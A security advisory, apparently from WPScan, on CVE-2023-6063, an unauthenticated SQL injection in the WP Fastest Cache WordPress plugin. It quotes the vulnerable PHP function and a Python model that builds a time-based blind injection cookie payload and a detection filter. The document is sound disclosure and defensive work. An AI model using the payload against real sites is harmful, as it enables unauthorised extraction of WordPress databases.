During an internal review of the WP Fastest Cache plugin, the WPScan team discovered a serious SQL injection vulnerability. This vulnerability may allow unauthenticated attackers to read the full contents of the WordPress database using a time‑based blind SQL injection payload.
Upon discovering the vulnerability, we promptly alerted the plugin development team, who released version 1.2.2 to fix the issue. It is crucial for administrators to ensure their WordPress installations, including this plugin, are fully updated to safeguard against this vulnerability.
Unauthenticated SQL Injection
Plugin Name | WP Fastest Cache
Plugin URL | https://wordpress.org/plugins/wp-fastest-cache/
Author | https://www.wpfastestcache.com
Affected Versions | Versions lower than 1.2.2
CVE ID | CVE-2023-6063
WPScan ID | 30a74105-8ade-4198-abe2-1c6f2967443e
CVSSv3.1 | 8.6
The is_user_admin function of the WpFastestCacheCreateCache class is vulnerable to SQL Injection. The function is called from the createCache function.
public function is_user_admin(){
    global $wpdb;

    // Any cookie whose name contains "wordpress_logged_in" is accepted; the value
    // is never validated, only cut off at the first "|".
    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
        if(preg_match("/wordpress_logged_in/i", $cookie_key)){
            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
            break;
        }
    }

    if(isset($username) && $username){
        // $username is interpolated straight into the SQL string: no escaping, no prepare().
        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
            FROM `$wpdb->users`
            INNER JOIN `$wpdb->usermeta`
            ON `$wpdb->users`.`user_login` = \"$username\" AND
            `$wpdb->usermeta`.`meta_key` LIKE \"%_user_level\" AND
            `$wpdb->usermeta`.`meta_value` = \"10\" AND
            `$wpdb->users`.`ID` = `$wpdb->usermeta`.user_id ;"
        );

        return $res;
    }

    return false;
}
The function retrieves the $username variable from any cookie whose name contains the text wordpress_logged_in, keeping everything up to the first | character (or the whole value, if it contains no |). The cookie is never validated as a real session, so no account is needed. The variable is then inserted into the query without escaping or a prepared statement. Note that this function is called at plugin load time, which is before wp_magic_quotes() has been called on the request data, so the slashes WordPress would otherwise add in front of quote characters are not yet present.
Since the result of the query is never output anywhere, there is no direct way to read it. However, a time-based blind SQL injection payload (a conditional SLEEP() that delays the response only when a guessed value is correct) can extract any information from the database using this vulnerability.
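To make the cookie-to-query path concrete, here is a small Python model written for this page; it is not the plugin's code and not WPScan's proof of concept. It re-implements the loop above, renders the interpolated query for a genuine-looking cookie and for a time-based probe cookie, and adds a request-side check that a reverse proxy or log review could apply to Cookie headers. Assumptions: the default wp_ table prefix, MySQL's IF()/SLEEP() behaviour for the probe, and the constructed cookie values in the block.

```python
"""Python model of the is_user_admin() cookie path described above.

Written for this page; it is NOT WP Fastest Cache code and not WPScan's
proof of concept. Assumptions: the default "wp_" table prefix, MySQL's
IF()/SLEEP() behaviour for the probe, and the constructed cookie values.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import quote_plus, unquote_plus

WP_PREFIX = "wp_"  # assumed; WordPress installs may use another prefix

# Character set of a stored user_login (strict-mode sanitize_user()), so a
# '"' or '\' before the first '|' of an auth cookie is never legitimate.
LEGIT_USERNAME = re.compile(r"^[A-Za-z0-9 _.@-]+$")


def username_from_cookies(cookies: Dict[str, str]) -> Optional[str]:
    """Mirror of the foreach loop: first cookie whose name contains
    wordpress_logged_in (case-insensitive), truncated at the first '|'.
    `cookies` stands in for $_COOKIE, i.e. values are already URL-decoded."""
    for name, value in cookies.items():
        if re.search(r"wordpress_logged_in", name, re.IGNORECASE):
            # preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); like PHP,
            # re.sub returns the value unchanged when there is no '|' at all.
            return re.sub(r"^([^|]+)\|.+", r"\1", value)
    return None


def vulnerable_query(username: str, prefix: str = WP_PREFIX) -> str:
    """The advisory's query assembled by interpolation, as the plugin did.
    Nothing escapes `username`, so a '"' in it terminates the literal."""
    u, m = f"`{prefix}users`", f"`{prefix}usermeta`"
    return (
        f"SELECT {u}.`ID`, {u}.`user_login`, {m}.`meta_key`, {m}.`meta_value` "
        f"FROM {u} INNER JOIN {m} "
        f'ON {u}.`user_login` = "{username}" AND '
        f'{m}.`meta_key` LIKE "%_user_level" AND '
        f'{m}.`meta_value` = "10" AND '
        f"{u}.`ID` = {m}.user_id ;"
    )


def time_based_probe(position: int, guess: str, delay: int = 5,
                     prefix: str = WP_PREFIX) -> str:
    """Cookie value for one time-based blind test. The text before '|' closes
    the literal, then MySQL sleeps `delay` seconds only if character
    `position` of the first user_login equals `guess` (sent as a hex literal
    so the payload needs no further quote characters); the trailing
    "1"="1 re-closes the literal so the statement stays syntactically valid.
    Repeating this over positions and guesses recovers the value one
    character at a time: response latency is the only channel that leaks."""
    target = f"(SELECT user_login FROM {prefix}users ORDER BY ID LIMIT 1)"
    cond = f"SUBSTRING({target},{position},1)=0x{ord(guess):02x}"
    return f'" OR IF({cond},SLEEP({delay}),0) AND "1"="1|x'


def flagged_logged_in_cookies(cookie_header: str) -> List[str]:
    """Names of wordpress_logged_in* cookies in a raw Cookie header whose
    username segment could not have come from sanitize_user(). Values are
    decoded the way PHP fills $_COOKIE (urldecode: %22 -> '"', '+' -> ' ')
    before checking, so a percent-encoded quote is caught too."""
    flagged = []
    for part in cookie_header.split(";"):
        name, sep, raw = part.strip().partition("=")
        if not sep or not re.search(r"wordpress_logged_in", name, re.IGNORECASE):
            continue
        segment = unquote_plus(raw).split("|", 1)[0]
        if not LEGIT_USERNAME.fullmatch(segment):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    # Constructed inputs: a plausible genuine auth cookie and a probe cookie.
    genuine = {"wordpress_logged_in_abc123": "wpadmin|1700000000|Ab12Cd34|0123456789abcdef"}
    probe = {"wordpress_logged_in_abc123": time_based_probe(1, "a")}
    print(vulnerable_query(username_from_cookies(genuine)))
    print(vulnerable_query(username_from_cookies(probe)))
    header = "wordpress_logged_in_abc123=" + quote_plus(probe["wordpress_logged_in_abc123"])
    print("flagged:", flagged_logged_in_cookies(header))
```

The second printed query shows the attacker-controlled text sitting inside the ON clause with the original literal closed early, which is the whole bug. On the WordPress side the standard remedy for this class of flaw is to bind the value with $wpdb->prepare() and a %s placeholder rather than interpolate it; on the request side, flagged_logged_in_cookies() is a cheap filter because a legitimate auth cookie can never carry a quote or backslash before its first |.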
The proof‑of‑concept for this vulnerability will be available in the WPScan entry for the vulnerability on Nov. 27, 2023.
Credits
Original researcher: Alex Sanford
Many thanks to the rest of the WPScan team for their invaluable feedback, assistance, and corrections.